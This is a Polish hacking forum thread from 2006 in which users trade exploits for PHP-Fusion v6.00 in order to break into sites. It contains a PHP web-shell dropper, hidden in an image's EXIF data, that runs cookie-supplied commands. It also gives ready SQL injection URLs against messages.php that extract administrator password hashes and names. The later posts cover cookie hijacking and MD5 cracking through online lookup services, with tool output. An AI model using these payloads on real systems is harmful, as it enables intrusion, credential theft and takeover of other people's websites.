PHP-Fusion v6.00

Lama2006

Użytkownik
Dołączył
Luty 25, 2006
Posty
20
Witam szukam exploitow do tej wersji cms-a PHP-Fusion v6.00 tylko nie pisac szukaj w google itp.
 

dool

Użytkownik
Dołączył
Maj 28, 2006
Posty
2
Ja też znalazłem na tej stronie exploita wykorzystującego dziurę podzczas wstawiania avatarów. Jednak nie za bardzo łapię angielski. Mógłby mi ktoś to szybko streśćić???

Z góry wielki dzięki.
 

FDJ

Były Moderator
Dołączył
Maj 23, 2005
Posty
1044
Originally posted by dool
Ja też znalazłem na tej stronie exploita wykorzystującego dziurę podzczas wstawiania avatarów. Jednak nie za bardzo łapię angielski. Mógłby mi ktoś to szybko streśćić???

Z góry wielki dzięki.

nie
 

dool

Użytkownik
Dołączył
Maj 28, 2006
Posty
2
No ale proszę. Jakbym znał lepiej angielski to bym sam to zrobił. Próbowałem sam i nic nie wychodzi mi! Narazie tyle co zrozumiałem to że:

1.Biorę ten plik i zmieniam jego nazwę na:
suntzu.php.php[1].gif

2.Wstawiam do EXIF ten kod:

Kod:
<?php

$fp=fopen("suntzu.php","w");

fputs($fp,"<?php error_reporting(0);set_time_limit(0);if (get_magic_quotes_gpc()) {$_COOKIE[cmd]=stripslashes($_COOKIE[cmd]);}echo 56789;passthru($_COOKIE[cmd]);echo 56789;?>");

fclose($fp);

chmod("suntzu.php",777);

?>

3. Potem wsadzam plik na serwer za pomocą formularza

4. I odpalam go.

Jednak mi to nie wychodzi. Gdzie robię błąd????
 

sirklleh

Użytkownik
Dołączył
Czerwiec 18, 2006
Posty
2
Witam.

Natrafilem niejako przypadkiem na ten temat i postanowilem przyjrzec mu sie blizej, przeciez trzeba sie doksztalcac ;p przejrzalem dosc pobieznie link podany przez Lama2006 link. Ku mojemu zaskoczeniu jakos nie moge go pojac, a raczej dojsc do tego jak go zastosowac w praktyce, pomimo tego iz w przeciwienstwie do poprzednikow znam angielski (o ile w ogole mozna powiedziec ze sie zna jakis jezyk ;p) i conajmniej podstawy php. KOd jest napisany jakby pod formularz, wystepuja tam zmienne $host $path itd ktorych wartosci nie ma gdzie zadeklarowac, przypisana jest im jedynie zmienna $argv ktora tez nie wiadomo skad sie wziela ;p Nie mam doswiadczenia w exploitach wiec prosilbm o wytlumaczenie mi zastosowania tego exploita ;p
 

V0lrath

Użytkownik
Dołączył
Czerwiec 9, 2006
Posty
25
Widocznie da radę wykorzystać srch_where by wstawić ("wstrzyknąć") pewien włąsny kod, a dokładniej zapytanie do bazy danych sql o loginy i hasła adminów (poziom 103 użytkownika), a potem zwrócić to uruchamiającemu skrypt.

Użycie jest proste, wystarczy przeczytać początek - albo odpalić bez żadnych opcji.
Trzeba być zarejestrowanym na atakowanym forum.
 

_MaVeR_

Użytkownik
Dołączył
Lipiec 26, 2005
Posty
204
a moze tak :

rejestrujemy sie na stronie .. logujemy ..

i doklejamy do adresu pewien kod np.


xxx.xxx.pl/messages.php?folder=inbox&show=_&srch_where=999999%20UNION%20SELECT%200,0,0,user_password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20fusion_users%20WHERE%20user_level=103/*

i mamy hash admina =]

potem wlazimy na np.

xxx.xxx.pl/messages.php?folder=inbox&show=_&srch_where=999999 UNION SELECT 0,0,0,user_name,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM fusion_users WHERE user_level=103/*

i mamy nazwy adminow =]


potem tylko rozkodowanie hasha lub podmiana cookie i jestesmy ;>
 

podolaczek

Użytkownik
Dołączył
Maj 10, 2006
Posty
4
W jaki sposob podmienic te cookie? Mozecie to jakos opisac?
<
 

sirklleh

Użytkownik
Dołączył
Czerwiec 18, 2006
Posty
2
do podmiany cookies'ow polecam opere bo ma bardzo wygodnego mendżera ciastek... wszystko zalezy od przegladarki ktorej uzywasz, ale wystarczy znalezc folder w ktorym przechowuje Ci przegladarka cookies'y i znalezc tego od strony ktora atakujesz ...
 

_MaVeR_

Użytkownik
Dołączył
Lipiec 26, 2005
Posty
204
to on niech ci wytlumaczy na operze a jak chcesz haslo admina to zlam md5 programem maSs'a najlepiej =] (tylko 2 dni czekania xD)
 

D0han

Były Moderator
Dołączył
Lipiec 27, 2005
Posty
975
Originally posted by _MaVeR_
zlam md5 programem maSs'a najlepiej =] (tylko 2 dni czekania xD)
No nie wiem, ostatnio zauwazylem ze program stal sie troche mocno nieaktualny.
W tym momencie potrafi korzystac z chyba juz tylko jednego serwisu.
 

_MaVeR_

Użytkownik
Dołączył
Lipiec 26, 2005
Posty
204
mi tam z wszystkich kozysta i jak nic nieznajdzie to do tych ruskich sie przesyla md5 i dekoduja
<
 

D0han

Były Moderator
Dołączył
Lipiec 27, 2005
Posty
975
Hmm, faktycznie. Widac cos przeoczylem, ale to nie zmienia faktu ze z lamaniem MD5 sa 'pewne' problemy:
Kod:
Rozpoczęto o : 12:25:13 - 24-06-2006

Hash : 212a4c389db4ecfacf61817a711cf892

Liczba serwisów : 7/7

-----------------------------

Serwis : passcracking.ru [~15.5 mln]

Status : Brak hasha w bazie, dodano do kolejki...

-------------

Serwis : md5.altervista.org [~5.1 mln]

Status : Nie udało się odkodować hasha :-(

-------------

Serwis : shm.hard-core.pl [~3.0 mln]

Status : Nie udało się odkodować hasha :-(

-------------

Serwis : securitystats.com [~10.0 tyś]

Status : Nie udało się odkodować hasha :-(

-------------

Serwis : passcrack.spb.ru [~7.9 mln]

-------------

Serwis : milw0rm.com [~10.0 tyś]

Status : Błąd komunikacji z serwisem !!!

-------------

Serwis : gdataonline.com [~73,6 mln]

Status : 

-------------

Zakończono o : 12:25:57 - 24-06-2006

-----------------------------
 
Do góry Bottom